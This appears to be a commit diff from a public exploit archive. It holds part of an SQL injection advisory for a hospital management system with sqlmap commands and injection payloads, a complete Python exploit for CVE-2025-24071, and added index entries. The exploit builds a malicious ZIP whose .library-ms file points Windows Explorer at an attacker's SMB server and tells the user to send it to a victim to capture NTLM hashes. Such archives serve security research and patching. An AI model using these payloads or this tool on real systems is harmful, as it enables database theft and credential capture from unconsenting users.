Origin: http://127.0.0.1
Connection: keep-alive
Referer: http://127.0.0.1/HospitalManagementSystem/hospital/hms/admin/between-dates-reports.php
Cookie: ajs_anonymous_id=e18be7d3-2b50-4bed-9962-5cfab989426f; PHPSESSID=hfb8j1phivvf11o2j9cd492oqe
Upgrade-Insecure-Requests: 1
Priority: u=0, i
fromdate=&todate=&submit=
=======================================|| Blind Time Based - fromdate field ||==============================================
SQLMap identified the following injection payload:
Parameter: fromdate (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: fromdate=2019-01-01' AND (SELECT 5962 FROM (SELECT(SLEEP(5)))danz) AND 'awPP'='awPP&todate=2025-05-28&submit=
SQLMap first command to confirm the vulnerability: “sqlmap -r request.txt -p fromdate --dbs --random-agent --technique=T”
=======================================|| Boolean Based - todate field ||==============================================
todate field is vulnerable to SQL Injection on reports accessed on “/admin/betweendates-detailsreports.php” from POST request
SQLMap identified the following injection payload:
Parameter: todate (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: fromdate=2019-01-01&todate=2025-05-28' AND 3290=3290 AND 'yOfc'='yOfc&submit=
SQLMap first command to confirm the vulnerability: “sqlmap -r request.txt -p todate --dbs --random-agent --technique=B”
=======================================|| Union Query - todate field ||==============================================
Another technique on todate field can be exploited
SQLMap identified the following injection payload:
Parameter: todate (POST)
Type: UNION query
Title: Generic UNION query (NULL) - 11 columns
Payload: fromdate=2019-01-01&todate=2025-05-28' UNION ALL SELECT CONCAT(CONCAT('qkpxq','eLwmjRlXmPYByrACqjbUDqzOqYmBeKwQSUSMNXdM'),'qzzbq'),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ckvh&submit=
SQLMap first command to confirm the vulnerability: “sqlmap -r request.txt -p todate --dbs --random-agent --technique=U”

85
exploits/windows/remote/52310.py Executable file
View file

@ -0,0 +1,85 @@
#!/usr/bin/env python3
# Exploit Title: Windows File Explorer Windows 11 (23H2) - NTLM Hash Disclosure
# Exploit Author: Mohammed Idrees Banyamer
# Twitter/GitHub:https://github.com/mbanyamer
# Date: 2025-05-27
# CVE: CVE-2025-24071
# Vendor: Microsoft
# Affected Versions: Windows 10/11 (All supporting .library-ms and SMB)
# Tested on: Windows 11 (23H2)
# Type: Local / Remote (NTLM Leak)
# Platform: Windows
# Vulnerability Type: Information Disclosure
# Description:
# Windows Explorer automatically initiates an SMB authentication request when a
# .library-ms file is extracted from a ZIP archive. This causes NTLM credentials
# (in hashed format) to be leaked to a remote SMB server controlled by the attacker.
# No user interaction is required beyond extraction.
import zipfile
from pathlib import Path
import argparse
import re
import sys
from colorama import Fore, Style
def create_library_ms(ip: str, filename: str, output_dir: Path) -> Path:
"""Creates a malicious .library-ms file pointing to an attacker's SMB server."""
payload = f'''<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
<searchConnectorDescriptionList>
<searchConnectorDescription>
<simpleLocation>
<url>\\\\{ip}\\shared</url>
</simpleLocation>
</searchConnectorDescription>
</searchConnectorDescriptionList>
</libraryDescription>'''
output_file = output_dir / f"{filename}.library-ms"
output_file.write_text(payload, encoding="utf-8")
return output_file
def build_zip(library_file: Path, output_zip: Path):
"""Packages the .library-ms file into a ZIP archive."""
with zipfile.ZipFile(output_zip, 'w', zipfile.ZIP_DEFLATED) as archive:
archive.write(library_file, arcname=library_file.name)
print(f"{Fore.GREEN}[+] Created ZIP: {output_zip}{Style.RESET_ALL}")
def is_valid_ip(ip: str) -> bool:
return re.match(r"^\d{1,3}(\.\d{1,3}){3}$", ip) is not None
def main():
parser = argparse.ArgumentParser(
description="CVE-2025-24071 - NTLM Hash Disclosure via .library-ms ZIP Archive",
epilog="example:\n python3 CVE-2025-24071_tool.py -i 192.168.1.100 -n payload1 -o ./output_folder --keep",
formatter_class=argparse.RawTextHelpFormatter
)
parser.add_argument("-i", "--ip", required=True, help="Attacker SMB IP address (e.g., 192.168.1.100)")
parser.add_argument("-n", "--name", default="malicious", help="Base filename (default: malicious)")
parser.add_argument("-o", "--output", default="output", help="Output directory (default: ./output)")
parser.add_argument("--keep", action="store_true", help="Keep .library-ms file after ZIP creation")
args = parser.parse_args()
if not is_valid_ip(args.ip):
print(f"{Fore.RED}[!] Invalid IP address: {args.ip}{Style.RESET_ALL}")
sys.exit(1)
output_dir = Path(args.output)
output_dir.mkdir(parents=True, exist_ok=True)
print(f"{Fore.CYAN}[*] Generating malicious .library-ms file...{Style.RESET_ALL}")
library_file = create_library_ms(args.ip, args.name, output_dir)
zip_file = output_dir / f"{args.name}.zip"
build_zip(library_file, zip_file)
if not args.keep:
library_file.unlink()
print(f"{Fore.YELLOW}[-] Removed intermediate .library-ms file{Style.RESET_ALL}")
print(f"{Fore.MAGENTA}[!] Done. Send ZIP to victim and listen for NTLM hash on your SMB server.{Style.RESET_ALL}")
if __name__ == "__main__":
main()

6
files_exploits.csv
View file

@ -10794,6 +10794,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
46731,exploits/multiple/remote/46731.rb,"Atlassian Confluence Widget Connector Macro - Velocity Template Injection (Metasploit)",2019-04-19,Metasploit,remote,multiple,,2019-04-19,2019-04-19,1,CVE-2019-3396,Remote,,,,https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/multi/http/confluence_widget_connector.rb
38905,exploits/multiple/remote/38905.rb,"Atlassian HipChat for Jira Plugin - Velocity Template Injection (Metasploit)",2015-12-08,Metasploit,remote,multiple,8080,2015-12-08,2015-12-08,1,CVE-2015-5603;OSVDB-126829,"Metasploit Framework (MSF)",,,,https://confluence.atlassian.com/jira/jira-and-hipchat-for-jira-plugin-security-advisory-2015-08-26-776650785.html
35898,exploits/multiple/remote/35898.php,"Atlassian JIRA 3.13.5 - File Download Security Bypass",2011-06-28,"Ignacio Garrido",remote,multiple,,2011-06-28,2015-01-26,1,,,,,,https://www.securityfocus.com/bid/48484/info
52309,exploits/multiple/remote/52309.txt,"Automic Agent 24.3.0 HF4 - Privilege Escalation",2025-05-29,"Flora Schäfer",remote,multiple,,2025-05-29,2025-05-29,0,CVE-2025-4971,,,,,
22296,exploits/multiple/remote/22296.txt,"Axis Communications HTTP Server 2.x - Messages Information Disclosure",2003-02-28,"Martin Eiszner",remote,multiple,,2003-02-28,2012-10-28,1,CVE-2003-1386;OSVDB-4806,,,,,https://www.securityfocus.com/bid/6980/info
43985,exploits/multiple/remote/43985.txt,"Axis Communications MPQT/PACS - Heap Overflow / Information Leakage",2017-11-30,bashis,remote,multiple,,2018-02-07,2018-02-07,0,,,,,,https://github.com/mcw0/PoC/blob/9a1d3d165d7b32addf6d0a9ccf86626ee7e76093/Axis_Communications_MPQT_PACS_Heap_Overflow_and_information_leakage.txt
40125,exploits/multiple/remote/40125.py,"Axis Communications MPQT/PACS 5.20.x - Server-Side Include Daemon Remote Format String",2016-07-19,bashis,remote,multiple,,2016-07-19,2018-02-07,0,,,,,,https://github.com/mcw0/PoC/blob/53a2d49c1e4076e8559bb937f790e724fc52ca1d/axis-ssid-PoC.py
@ -10936,6 +10937,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
28210,exploits/multiple/remote/28210.txt,"FLV Players 8 - 'popup.php?url' Cross-Site Scripting",2006-07-12,xzerox,remote,multiple,,2006-07-12,2013-09-11,1,CVE-2006-3624;OSVDB-28644,,,,,https://www.securityfocus.com/bid/18954/info
36013,exploits/multiple/remote/36013.txt,"foomatic-gui python-foomatic 0.7.9.4 - 'pysmb.py' Arbitrary Shell Command Execution",2011-08-03,daveb,remote,multiple,,2011-08-03,2015-02-07,1,,,,,,https://www.securityfocus.com/bid/48982/info
39222,exploits/multiple/remote/39222.txt,"Foreman Smart-Proxy - Remote Command Injection",2014-06-05,"Lukas Zapletal",remote,multiple,,2014-06-05,2016-01-11,1,CVE-2014-0007;OSVDB-108277,,,,,https://www.securityfocus.com/bid/68117/info
52308,exploits/multiple/remote/52308.py,"Fortra GoAnywhere MFT 7.4.1 - Authentication Bypass",2025-05-29,İbrahimsql,remote,multiple,,2025-05-29,2025-05-29,0,CVE-2024-0204,,,,,
23707,exploits/multiple/remote/23707.txt,"Freeform Interactive Purge 1.4.7/Purge Jihad 2.0.1 Game Client - Remote Buffer Overflow",2004-02-16,"Luigi Auriemma",remote,multiple,,2004-02-16,2012-12-31,1,CVE-2004-0290;OSVDB-3982,,,,,https://www.securityfocus.com/bid/9671/info
29873,exploits/multiple/remote/29873.php,"FreePBX 2.2 - SIP Packet Multiple HTML Injection Vulnerabilities",2007-04-20,XenoMuta,remote,multiple,,2007-04-20,2013-11-28,1,CVE-2007-2191;OSVDB-35315,,,,,https://www.securityfocus.com/bid/23575/info
47698,exploits/multiple/remote/47698.rb,"FreeSWITCH - Event Socket Command Execution (Metasploit)",2019-11-20,Metasploit,remote,multiple,,2019-11-20,2019-11-20,1,,"Metasploit Framework (MSF)",,,,https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/multi/misc/freeswitch_event_socket_cmd_exec.rb
@ -11532,6 +11534,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
27931,exploits/multiple/remote/27931.txt,"Snort 2.4.x - URIContent Rules Detection Evasion",2006-05-31,"Blake Hartstein",remote,multiple,,2006-05-31,2013-08-29,1,CVE-2006-2769;OSVDB-25837,,,,,https://www.securityfocus.com/bid/18200/info
21029,exploits/multiple/remote/21029.pl,"Softek MailMarshal 4 / Trend Micro ScanMail 1.0 - SMTP Attachment Protection Bypass",2001-07-25,"Aidan O'Kelly",remote,multiple,,2001-07-25,2012-09-03,1,OSVDB-88584;OSVDB-88583,,,,,https://www.securityfocus.com/bid/3097/info
16324,exploits/multiple/remote/16324.rb,"Solaris Sadmind - Command Execution (Metasploit)",2010-06-22,Metasploit,remote,multiple,,2010-06-22,2016-10-27,1,CVE-2003-0722;OSVDB-4585,"Metasploit Framework (MSF)",,,,
52311,exploits/multiple/remote/52311.py,"SolarWinds Serv-U 15.4.2 HF1 - Directory Traversal",2025-05-29,İbrahimsql,remote,multiple,,2025-05-29,2025-05-29,0,CVE-2024-28995,,,,,
36537,exploits/multiple/remote/36537.txt,"SonicWALL AntiSpam & EMail 7.3.1 - Multiple Vulnerabilities",2012-01-10,"Benjamin Kunz Mejri",remote,multiple,,2012-01-10,2016-12-18,1,,,,,,https://www.securityfocus.com/bid/51337/info
31756,exploits/multiple/remote/31756.txt,"SonicWALL Email Security 6.1.1 - Error Page Cross-Site Scripting",2008-05-08,"Deniz Cevik",remote,multiple,,2008-05-08,2014-02-19,1,CVE-2008-2162;OSVDB-45017,,,,,https://www.securityfocus.com/bid/29107/info
24322,exploits/multiple/remote/24322.rb,"SonicWALL Gms 6 - Arbitrary File Upload (Metasploit)",2013-01-24,Metasploit,remote,multiple,,2013-01-24,2013-01-24,1,CVE-2013-1359;OSVDB-89347,"Metasploit Framework (MSF)",,,,
@ -11836,6 +11839,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
48145,exploits/multiple/webapps/48145.py,"Cacti 1.2.8 - Unauthenticated Remote Code Execution",2020-02-03,Askar,webapps,multiple,,2020-02-27,2020-02-27,0,CVE-2020-8813,,,,,https://github.com/mhaskar/CVE-2020-8813/blob/dfb48378f39249ff54ecf24ccd3b89db26971ccf/Cacti-preauth-rce.py
52067,exploits/multiple/webapps/52067.txt,"Calibre-web 0.6.21 - Stored XSS",2024-08-23,"Catalin Iovita_ Alexandru Postolache",webapps,multiple,,2024-08-23,2024-08-23,0,,,,,,
18430,exploits/multiple/webapps/18430.txt,"Campaign Enterprise 11.0.421 - SQL Injection",2012-01-30,"Craig Freyman",webapps,multiple,,2012-01-30,2012-01-30,0,OSVDB-78888,,,,,
52312,exploits/multiple/webapps/52312.txt,"Campcodes Online Hospital Management System 1.0 - SQL Injection",2025-05-29,"Carine Constantino",webapps,multiple,,2025-05-29,2025-05-29,0,CVE-2025-5298,,,,,
18247,exploits/multiple/webapps/18247.txt,"Capexweb 1.1 - SQL Injection",2011-12-16,"D1rt3 Dud3",webapps,multiple,,2011-12-16,2011-12-16,1,OSVDB-77998;CVE-2011-5031,,,,,
50792,exploits/multiple/webapps/50792.go,"Casdoor 1.13.0 - SQL Injection (Unauthenticated)",2022-02-28,"Mayank Deshmukh",webapps,multiple,,2022-02-28,2022-02-28,0,CVE-2022-24124,,,,,
48553,exploits/multiple/webapps/48553.txt,"Cayin Content Management Server 11.0 - Remote Command Injection (root)",2020-06-04,LiquidWorm,webapps,multiple,,2020-06-04,2020-06-04,0,,,,,,
@ -12504,6 +12508,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
52248,exploits/multiple/webapps/52248.txt,"WooCommerce Customers Manager 29.4 - Post-Authenticated SQL Injection",2025-04-16,"Ivan Spiridonov",webapps,multiple,,2025-04-16,2025-04-16,0,CVE-2024-0399,,,,,
47690,exploits/multiple/webapps/47690.md,"WordPress Core < 5.2.3 - Viewing Unauthenticated/Password/Private Posts",2019-10-14,"Sebastian Neef",webapps,multiple,,2019-11-19,2019-11-19,0,CVE-2019-17671,,,,,https://0day.work/proof-of-concept-for-wordpress-5-2-3-viewing-unauthenticated-posts/
52285,exploits/multiple/webapps/52285.py,"WordPress Depicter Plugin 3.6.1 - SQL Injection",2025-05-09,"Andrew Long",webapps,multiple,,2025-05-09,2025-05-09,0,CVE-2025-2011,,,,,https://github.com/datagoboom/CVE-2025-2011
52307,exploits/multiple/webapps/52307.txt,"WordPress Digits Plugin 8.4.6.1 - Authentication Bypass via OTP Bruteforcing",2025-05-29,"Saleh Tarawneh",webapps,multiple,,2025-05-29,2025-05-29,0,CVE-2025-4094,,,,,
52291,exploits/multiple/webapps/52291.py,"WordPress Frontend Login and Registration Blocks Plugin 1.0.7 - Privilege Escalation",2025-05-13,"Md Shoriful Islam",webapps,multiple,,2025-05-13,2025-05-13,0,CVE-2025-3605,,,,,
49189,exploits/multiple/webapps/49189.txt,"Wordpress Plugin Canto 1.3.0 - Blind SSRF (Unauthenticated)",2020-12-04,"Pankaj Verma",webapps,multiple,,2020-12-04,2020-12-04,0,CVE-2020-28976;CVE-2020-28977;CVE-2020-28978,,,,,
48919,exploits/multiple/webapps/48919.txt,"WordPress Plugin Colorbox Lightbox v1.1.1 - Persistent Cross-Site Scripting (Authenticated)",2020-10-20,n1x_,webapps,multiple,,2020-10-20,2020-10-20,0,,,,,,
@ -45941,6 +45946,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
16335,exploits/windows/remote/16335.rb,"WinComLPD 3.0.2 - Remote Buffer Overflow (Metasploit)",2010-06-22,Metasploit,remote,windows,,2010-06-22,2011-03-06,1,CVE-2008-5159;OSVDB-42861,"Metasploit Framework (MSF)",,,,
51575,exploits/windows/remote/51575.txt,"Windows 10 v21H1 - HTTP Protocol Stack Remote Code Execution",2023-07-07,nu11secur1ty,remote,windows,,2023-07-07,2023-07-07,0,CVE-2022-21907,,,,,
52300,exploits/windows/remote/52300.py,"Windows 2024.15 - Unauthenticated Desktop Screenshot Capture",2025-05-25,"Chokri Hammedi",remote,windows,,2025-05-25,2025-05-25,0,CVE-n/a,,,,,
52310,exploits/windows/remote/52310.py,"Windows File Explorer Windows 11 (23H2) - NTLM Hash Disclosure",2025-05-29,"Mohammed Idrees Banyamer",remote,windows,,2025-05-29,2025-05-29,0,CVE-2025-24071,,,,,
30169,exploits/windows/remote/30169.txt,"WindowsPT 1.2 - User ID Key Spoofing",2007-06-11,nnposter,remote,windows,,2007-06-11,2013-12-10,1,CVE-2007-3201;OSVDB-41727,,,,,https://www.securityfocus.com/bid/24412/info
16529,exploits/windows/remote/16529.rb,"WinDVD7 - 'IASystemInfo.dll' ActiveX Control Buffer Overflow (Metasploit)",2010-05-09,Metasploit,remote,windows,,2010-05-09,2011-03-10,1,CVE-2007-0348;OSVDB-34315,"Metasploit Framework (MSF)",,,,
7875,exploits/windows/remote/7875.pl,"WinFTP Server 2.3.0 - 'LIST' (Authenticated) Remote Buffer Overflow",2009-01-26,"joe walko",remote,windows,21,2009-01-25,2016-09-27,1,OSVDB-51667;CVE-2009-0351,,,,,

Can't render this file because it is too large.